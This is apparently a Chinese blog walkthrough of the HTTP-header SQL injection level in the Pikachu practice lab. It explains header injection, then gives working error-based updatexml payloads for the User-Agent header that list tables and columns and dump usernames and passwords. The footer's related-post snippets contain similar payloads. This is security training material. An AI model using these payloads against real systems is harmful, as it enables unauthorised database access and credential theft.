Pikachu SQL注入之http头注入

最新推荐文章于 2024-01-30 09:41:16 发布
最新推荐文章于 2024-01-30 09:41:16 发布
阅读量541 收藏 12
点赞数 13
文章标签: sql http 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SS_liang/article/details/135542208
版权

账号admin 密码123456登录进去,然后进入后台我们就可以看到这个界面:

这里解释一下http头注入:

HTTP头注入是一种安全漏洞,它允许攻击者在HTTP请求或响应的头部字段中插入恶意内容。这种漏洞通常发生在未正确验证或过滤用户输入的情况下。

HTTP头包含在请求或响应的起始行和头部字段中。攻击者可以通过在头部字段中插入特定的控制字符或换行符来注入恶意内容。这可能导致以下安全问题:

1. HTTP响应拆分攻击:攻击者可以在响应头部中插入换行符,从而在HTTP响应中创建多个响应。这可能导致攻击者注入恶意内容,如恶意重定向或注入恶意脚本。

2. HTTP响应走私攻击:攻击者可以在响应头部中插入特定的控制字符,从而欺骗代理服务器或浏览器,使其解析响应的方式与服务器预期的不同。这可能导致绕过安全控制,如绕过身份验证或访问受限资源。

3. HTTP请求劫持攻击:攻击者可以在请求头部中插入恶意内容,如恶意URL或恶意Cookie。这可能导致用户被重定向到攻击者控制的站点,或者攻击者能够获取用户的敏感信息。

这个界面给了两个提示,一个是UA头就是use agent另一个就是Accept头,这里我们就直接尝试在UA头进行测试:

使用burp suite抓包:(这里有个插件比较方便,叫ModHeader,在火狐也可以安装)

我这里只用bp给大家做示范,想用插件的可以去网上搜一下。

由于前面一直都是报错注入,所以我这边直接使用报错注入尝试,单引号闭合:

爆库名:

这里OR是一个逻辑运算符,用于将两个或多个条件中的任何一个满足的情况下返回true,这里可以使用and但是后面使用报错注入的时候and就不合适了。

爆表名:

' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or '

爆列名:

' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) or '

爆数据:

' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,' : ',password)) from users),1,31),0x7e),1) or '

于是用户名和密码都有了。

拿下!

zTale
关注
  • 13
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
获取sql数据,发送http请求实现自动调用接口
u012025527的博客
06-01 440
python3.8.5,使用pymysql与requests库,连接数据库获取模板ID,发送http请求调用后台接口
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu~~~insert/update/delete,http注入
weixin_50339832的博客
05-30 751
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
piakchu-‘http header’注入
weixin_50339521的博客
10-29 1901
pikachu sql注入中的http header 注入
pikachu SQL注入(http header)
ANYOUZHEN的博客
05-10 1067
将该页面进行抓包处理 将UA修改为' 查看后发现报错了,说明存在注入漏洞 将UA修改为: firefox' or updatexml(1,concat(0x7e,database()),0) or ' 得到数据库pikachu
基于Pikachu测试平台的http header注入
qq_43499389的博客
03-19 1539
http header注入 有些时候,后台开发人员为了验证客户端信息(比如常用的cookie验证)或者通过http header信息获取客户端的一些信息,比如username、accept字段等等 会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的SQL Inject漏洞 我们可以先在http header注入...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
pikachu.rar
03-05
SQL注入是Web应用中常见的安全漏洞之一。当应用程序不恰当地处理用户输入的数据,使得恶意用户可以插入SQL命令时,就可能发生SQL注入。攻击者可以通过这种方式获取未授权的数据库访问权限,甚至篡改或删除关键数据。...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 824
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入
pikkachu的“http header”注入
weixin_50339082的博客
06-18 663
pikkachu的“http header”注入 一、原理 有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header 的sql注入漏洞。 二、实操 首先登陆 admin/123456 1.UA 发现有对部信息的获取,所以可能存在注入,抓包,发送到Repeater。
Pikachu靶场 “Http Header”SQL注入
感谢关注
12-23 744
2. 设置payload1 :在。设置payload2 :在。
pikachu-sql注入(皮卡丘)
twowords的博客
08-04 2058
数字型注入(post) post注入方式,可用BurpSuite进行抓包,发送到Repeater模块进行id值的修改 数字型注入 则不需要添加字符 payload: or 1=1 字符型注入(get) 字符型注入 当输入1'时 有报错信息''1'''可以看到源name值由单引号''包裹 可以用 '进行闭合 并用#注释掉后边内容 payload: 1' or 1=1 # 搜索型注入 根据提示 我们可以输入用户名一部分进行查询 并添加字符'如下图 并显示报错 由报错信息可以看到需要加%'进
pikachu靶场(sql注入)(delete和http注入和盲注)
weixin_54431413的博客
03-16 3693
pikachu的盲注,delete和http注入
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2647
Pikachu-----Sql Inject(SQL注入
皮卡丘注入实战
最新发布
A19911511842的博客
01-30 1683
4. 这里还可以用 其实’ ‘’判断注入是判断不出来的 所以每一个与数据库交互的地方都要去试一下 1’ or ‘1’=’1 有的没有报错也可能存在注入用poc:1’ or ‘1’=’1 和1’ or ‘1’=’2去看看有没有回显。5. 然后直接使用盲注 if()函数 if(1=1,1,0)----->if(mid(user(),1,1)='a',1,0)对a进行爆破。1’ and ‘1’!=’1 回显是不一样但你能发现 1’ and ‘1’=’2 与 1’ and ‘1’=’1 回显是一样的。
Pikachu数字型注入、字符型注入通关详解
小小小屿屿屿的博客
11-16 717
pikachu是一个漏洞练习平台,里面包含了大部分常见的Web漏洞,非常适合新手去联系,本文将详细讲述Pikachu靶场中的数字型注入、字符型注入这2关的攻略。
http header注入和宽字节注入
Williamanddog的博客
01-17 341
pikachuhttp header注入,cookie注入,宽字节注入
pikachu sql注入
08-11
引用和提到了一种叫做SQL注入的攻击方式。SQL注入是一种利用应用程序对用户输入的不当处理导致数据库执行非预期操作的漏洞。在引用和中提到的例子中,攻击者利用了应用程序中存在的漏洞,通过在用户输入中插入恶意的SQL代码,使数据库执行了恶意操作。具体来说,在这两个例子中,攻击者尝试获取pikachu数据库中的用户信息。 如果你对pikachu SQL注入感兴趣,我建议你参考引用中的文章。这篇文章详细介绍了字符型SQL注入的过程和防范措施,可以帮助你更好地理解和应对这种类型的攻击。123 #### 引用[.reference_title] - *1* *2* [PiKachuSql (SQL注入)通关 2022](https://blog.csdn.net/av11566/article/details/124259545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [pikachu-sql注入](https://blog.csdn.net/Resets_/article/details/129901110)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zTale

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值